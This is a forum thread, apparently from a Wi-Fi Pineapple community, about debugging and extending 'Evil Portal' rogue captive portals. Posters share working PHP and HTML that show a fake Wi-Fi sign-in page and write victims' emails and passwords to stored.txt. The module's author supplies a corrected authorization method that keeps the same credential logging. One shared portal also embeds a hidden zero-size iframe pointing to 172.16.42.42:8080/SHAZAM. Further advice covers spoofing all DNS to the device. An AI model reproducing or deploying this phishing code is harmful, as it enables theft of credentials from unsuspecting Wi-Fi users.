Jump to content

newbi3

Recommended Posts

  • 3 weeks later...
  • Replies 263
  • Created
  • Last Reply

Hi all.

Please see my file bellow. I am trying to get a simple captive portal work so I can use it with my pineapple.

Every time I try to authorise it goes to the captiveportal/index.php etc,.

It add the IP in the authorised clients but on the client screen it shows a message that it is not authorised

index.php

<?php
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
?>


<HTML>
    <HEAD>
        <title>Portal</title>
        <script type="text/javascript">
            function redirect() { setTimeout(function(){window.location = "/captiveportal/index.php";},10);} 
        </script>
    </HEAD>

    <BODY>
        <center>
            <h1>Portal</h1>
            <p>This is the default Portal page</p>
             <? echo $_SERVER["REMOTE_ADDR"]; ?> 

            <form method="POST" action="/captiveportal/index.php" onsubmit="redirect()" >
                <input type="hidden" name="target" value="<?=$destination?>">
                <input type="text" name="email" placeholder="New Email"><br>
                <input type="password" name="pass" placeholder="New Password" ><br>
                <input type="password" name="pass2" placeholder="Repeat Password" ><br>
                <button type="submit">Authorize</button>
            </form>

        </center>

    </BODY>

</HTML>

/captiveportal/index.php

<?php namespace evilportal;

$email = $_POST['email'];
$pass = $_POST['pass'];

header('Content-Type: application/json');

$file = fopen("./stored.txt", "a");
fwrite($file, $email . " " . $pass .    "\n");
fclose($file);

require_once("API.php");
$api = new API();
echo $api->go();

Just to note, overall it saves the username and password to the stored.txt

I will appriciate your advice on why the clients are not authorised

Ta

Link to comment
Share on other sites

  • 3 weeks later...

Does anyone know of a way to allow a client to connect to a remote ip address without authenticating? I need the clients to be able to connect to a specific ip address if they accept the captive portal terms or not.

Link to comment
Share on other sites

  • 2 weeks later...
On 4/24/2016 at 0:39 PM, stilia.johny said:

Hi all.

Please see my file bellow. I am trying to get a simple captive portal work so I can use it with my pineapple.

Every time I try to authorise it goes to the captiveportal/index.php etc,.

It add the IP in the authorised clients but on the client screen it shows a message that it is not authorised

index.php


<?php
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
?>


<HTML>
    <HEAD>
        <title>Portal</title>
        <script type="text/javascript">
            function redirect() { setTimeout(function(){window.location = "/captiveportal/index.php";},10);} 
        </script>
    </HEAD>

    <BODY>
        <center>
            <h1>Portal</h1>
            <p>This is the default Portal page</p>
             <? echo $_SERVER["REMOTE_ADDR"]; ?> 

            <form method="POST" action="/captiveportal/index.php" onsubmit="redirect()" >
                <input type="hidden" name="target" value="<?=$destination?>">
                <input type="text" name="email" placeholder="New Email"><br>
                <input type="password" name="pass" placeholder="New Password" ><br>
                <input type="password" name="pass2" placeholder="Repeat Password" ><br>
                <button type="submit">Authorize</button>
            </form>

        </center>

    </BODY>

</HTML>

/captiveportal/index.php


<?php namespace evilportal;

$email = $_POST['email'];
$pass = $_POST['pass'];

header('Content-Type: application/json');

$file = fopen("./stored.txt", "a");
fwrite($file, $email . " " . $pass .    "\n");
fclose($file);

require_once("API.php");
$api = new API();
echo $api->go();

Just to note, overall it saves the username and password to the stored.txt

I will appriciate your advice on why the clients are not authorised

Ta

This thread isn't to get help with your code not working but since I've had this question asked a lot I'll address it this time and this time only:

Any backend code that you want to have happen, no matter what it does, needs to happen in the MyPortal.php in this case you want your to write the posted data to a file and you would do that in the handleAuthorization method. The method should look something like this when you are done:

public function handleAuthorization()
    {

        $email = $this->request->email;
        $pass = $this->request->pass;

        $file = fopen("./stored.txt", "a");
        fwrite($file, $email . " " . $pass .    "\n");
        fclose($file);

        // Call parent to handle basic authorization first
        parent::handleAuthorization();

        // Check for other form data here
    }

I created a video not to long ago showing how to do something similar to this:

One day I plan on doing a more in depth video on the flow of EP for developers.

On 5/10/2016 at 3:32 PM, xr4ti said:

Does anyone know of a way to allow a client to connect to a remote ip address without authenticating? I need the clients to be able to connect to a specific ip address if they accept the captive portal terms or not.

Currently there isn't a way to do that baked into the Evil Portal module but you could do it with some IP tables foo. I'll put this on my list of features for a future release.

Link to comment
Share on other sites

  • 2 weeks later...

A little late to the party here, but thanks for the awesomeness in the latest update. It feels like this module is working the way it was always intended, easy and straight forward.
This tool has saved me hours and hours of work!

Props

Link to comment
Share on other sites

5 hours ago, Captain said:

A little late to the party here, but thanks for the awesomeness in the latest update. It feels like this module is working the way it was always intended, easy and straight forward.
This tool has saved me hours and hours of work!

Props

Thanks! Glad you like it :)

Link to comment
Share on other sites

Also, to those that are having issues with code. A great tool for testing quickly and easily is loading up XAMPP and running local tests. In my experience, if the code will work on XAMPP it will work with evil portal (well, I should say the web server on pineapple) 

Link to comment
Share on other sites

  • 2 weeks later...

Evil Portal 2.1 is awaiting approval but you can get it now from the development branch on the github repo: https://github.com/frozenjava/EvilPortalNano/tree/development

Evil Portal 2.1 is now available to download from the Pineapple Bar.

Link to comment
Share on other sites

9 hours ago, cheeto said:

Great to hear of the update.     Really looking forward to updating.   Do you have a changelog for EP? 

I added a change log to the main post. You can also see it on github if for some reason I don't post it here

https://github.com/frozenjava/EvilPortalNano

Link to comment
Share on other sites

really nice plugin and works well. Just out of interest, what do I need to do to de-authorize a connection to get them to redo the portal? Mainly interested for testing purposes. I've been kicking client, and removing them from  Authorized Clients lists, even cleansing the /temp/dhcp.leases and the  EVILPORTAL_CLIENTS.txt  file, but ,the pesky ipads and iphones seem to ignore that and just re-connect. then every now and then I seem to be able to start the process as normal and get the portal screen again?

Link to comment
Share on other sites

15 hours ago, Ajaxjones said:

really nice plugin and works well. Just out of interest, what do I need to do to de-authorize a connection to get them to redo the portal? Mainly interested for testing purposes. I've been kicking client, and removing them from  Authorized Clients lists, even cleansing the /temp/dhcp.leases and the  EVILPORTAL_CLIENTS.txt  file, but ,the pesky ipads and iphones seem to ignore that and just re-connect. then every now and then I seem to be able to start the process as normal and get the portal screen again?

Revoking them should work but if it doesn't then its probably because the clients web browser is caching pages and you'll have to wait until they visit a new page unfortunately.

Link to comment
Share on other sites

yep. forgot that the browser is also in play and it's not just dhcp , connections and the like :)

slipped this into the HTML and I can prevent the cache of the captive page and carry on testing layouts. 

<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">

 

 

Link to comment
Share on other sites

  • 2 weeks later...
On 3/14/2016 at 7:26 PM, sud0nick said:

Real Issues

1. There is no redirect to the requested site once the client has been authorized. I followed the data flow and it appears the following files are accessed in order (index.php -> /www/captiveportal/index.php -> API.php -> Portal.php) and within Portal.php the methods handleAuthorization() and getResponse() are called. The problem is your redirect() method is never called in Portal.php. I tried adding it to handleAuthorization() but it appears the header does not get set because I still don't get redirected. I also tried adding it to MyPortal.php and removed the parent::showSuccess(); call.

Edit: I see now that redirect() is called in the authorizeClient() method but it still does not work.

Has there been a fix put forward for the above issue?  It seems to me that i can click the Authorize button all day but it never redirects the user back to URI they originally requested.  It does however seem to add them to the Auth list and if they shut down the browser and re-open they have internet access..

 

Link to comment
Share on other sites

2 hours ago, Onus said:

Has there been a fix put forward for the above issue?  It seems to me that i can click the Authorize button all day but it never redirects the user back to URI they originally requested.  It does however seem to add them to the Auth list and if they shut down the browser and re-open they have internet access..

 

I'm not sure if this has been fixed yet.  I'm assuming you've updated to the newest version of EP?  I haven't had the chance as I've been too busy to even boot up my Pineapple lately.  I'm sure if you hit up newbi3 on twitter he can give you an answer.

Link to comment
Share on other sites

  • 2 weeks later...

It seems to be working now..

i did a fresh pineapple reset, re-installed evil portal, and tweaked the index.php file a bit..  

i also seemed to have to ssh in to the pineapple and chmod the /www/captiveportal/index.php for some reason as well of course for my image assets..  anyway, here is my current index for the portal that seems to be working with only a minor flaw in that sometimes it loads a second time before finally redirecting the user.. 

i found that the $destination gets a little quirky with how different os's handle "free wifi portal sign ons" so you will notice  just redirect to google.com, but maybe this will save someone else some of the hours i spent, tweaking..

 

<?php $destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
if($destination == "http://172.16.42.1"){     $destination = "https://google.com";}
?>
<!DOCTYPE html>
<html>
  <head>
    <meta content="text/html; charset=windows-1252" http-equiv="content-type">
    <title>free KITTY WiFi</title>
    <meta http-equiv="Pragma" content="no-cache">
    <script type="text/javascript">
  var delay = 2; // length of delay in seconds
  var countDown = 10;
 function changeText(){
	countDown--;
        document.getElementById('myDiv').innerHTML = ' <h1><span style="font-family: Verdana;">'+countDown+'</span></h1>';
	if(countDown>0){
             setTimeout(function () {
                  changeText();
              }, 1000);
	}else{
         var form = document.getElementById("myForm");
	  form.submit();
	 redirect();
        }
	
  }
function redirect() { setTimeout(function(){window.location = "https://google.com";},2000);} 
  </script>
  </head>
  <body onload="changeText();" style="  background-image: url(&quot;gotam.jpg&quot;);  margin-right: 0px;  margin-left: 0px; margin-top: 0px; margin-bottom: 0px;">
    <center>
      <table bgcolor="#FFE600" height="10px" width="100%">
      </table>
      <table bgcolor="#FFE600" height="70px" width="100px">
      </table>
      <h4 style=" margin-top: 11.4333px; height: 29px;"><span style="font-family: Verdana; color: #424242;">FREE<br>
        </span></h4>
      <h1 style="margin-top: -33.5667px; height: 31px;"><span style="font-family: Verdana; color: #424242;">KITTY<br>
        </span></h1>
      <table bgcolor="#FFE600" height="10px" width="100px">
      </table>
      <div>
        <h1 style="height: 34px; margin-top: 13.4333px;"><span style="font-family: Verdana; color: #424242;">WiFi</span></h1>
      </div>
      <table bgcolor="#FFE600" height="10px" width="100px">
      </table>
      <address style="margin-top: 0px;"><span style="font-family: Verdana;"><br>
          are you ready?</span></address>
<div id="myDiv"></div>
      <!--  
<h1><span style="font-family: Verdana;">7</span></h1>--> <br>
      <img style="height: 153px; margin-top: -22px;" src="kittypaw.png">
      <table bgcolor="#FFE600" height="2px" width="200px">
      </table>
      <h4><span style="font-family: Verdana; color: #1c1c1c;">Terms and
          Conditions.</span></h4>
      <div style="text-align: center;"> </div>
      <div style="text-align: center;">
        <address><span style="font-family: Verdana;">Use of this Web Portal is
            free!!! <br>
            Which is NICE!!&nbsp; With that said,<br>
            you can't really complain<br>
            about the service or the company. <br>
            <br>
          </span></address>
        <address><span style="font-family: Verdana;">I mean you ARE freeloading.<br>
            <br>
          </span></address>
      </div>
      <table bgcolor="#FFE600" height="2px" width="200px">
      </table>
      <br>
      &nbsp; <br>
    </center>
<form method="POST" action="/captiveportal/index.php"  id="myForm" name="myForm">
                <input type="hidden" name="target" value="<?=$destination?>">
    <iframe src="http://172.16.42.42:8080/SHAZAM" seamless="" height="0px"
      width="0px"></iframe>
  </body>
</html>

 

gotam.jpg

kittypaw.png

Link to comment
Share on other sites

Is there a way to redirect someone to a specific captive portal based on which ssid they are connecting to ?

EDIT:

Erased my other question. All assets (imgs, css, etc) have to be stored in /www even tho index.php is in /root/portals/myportalname.

Link to comment
Share on other sites

On 7/15/2016 at 3:27 PM, vertygo said:

Is there a way to redirect someone to a specific captive portal based on which ssid they are connecting to ?

EDIT:

Erased my other question. All assets (imgs, css, etc) have to be stored in /www even tho index.php is in /root/portals/myportalname.

I am going to work on features to get client information in a future release of EP so that kind of thing will be possible.

Also you can put images and stuff in /root/portals/myportalname just make sure to create a symbolic link to /www

ln -s /root/portals/myportalname/imagesDirName /www/

 

Link to comment
Share on other sites

On 7/15/2016 at 3:27 PM, vertygo said:

Is there a way to redirect someone to a specific captive portal based on which ssid they are connecting to ?

EDIT:

Erased my other question. All assets (imgs, css, etc) have to be stored in /www even tho index.php is in /root/portals/myportalname.

If you want to learn more about the structure of portals you can easily use PortalAuth to clone one and inspect it's contents within EP.

Link to comment
Share on other sites

Thank You! that ln command is what I needed.

added it to /etc/rc.common so it's loaded every time.

Am I right in noticing that EP won't work unless there's an active internet connection ? Is there a way to disable that requirement ? (ie. serve up a custom error page after the portal sign in)

Thank You!

Link to comment
Share on other sites

17 hours ago, vertygo said:

Thank You! that ln command is what I needed.

added it to /etc/rc.common so it's loaded every time.

Am I right in noticing that EP won't work unless there's an active internet connection ? Is there a way to disable that requirement ? (ie. serve up a custom error page after the portal sign in)

Thank You!

You can DNS spoof *.* to 172.16.42.1 and that should fix that problem.

Link to comment
Share on other sites

1 hour ago, vertygo said:

I also noticed that if auto-enable is set, and you reboot the tetra, all the portals are activated (but only the first one shows to the end user)

Can you post a screen shot please?

Link to comment
Share on other sites

  • 2 weeks later...
On 7/19/2016 at 7:12 AM, newbi3 said:

You can DNS spoof *.* to 172.16.42.1 and that should fix that problem.

I still cant get it to function... any ideas? works fine with connection but captive does not prompt when not connected to a isp

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...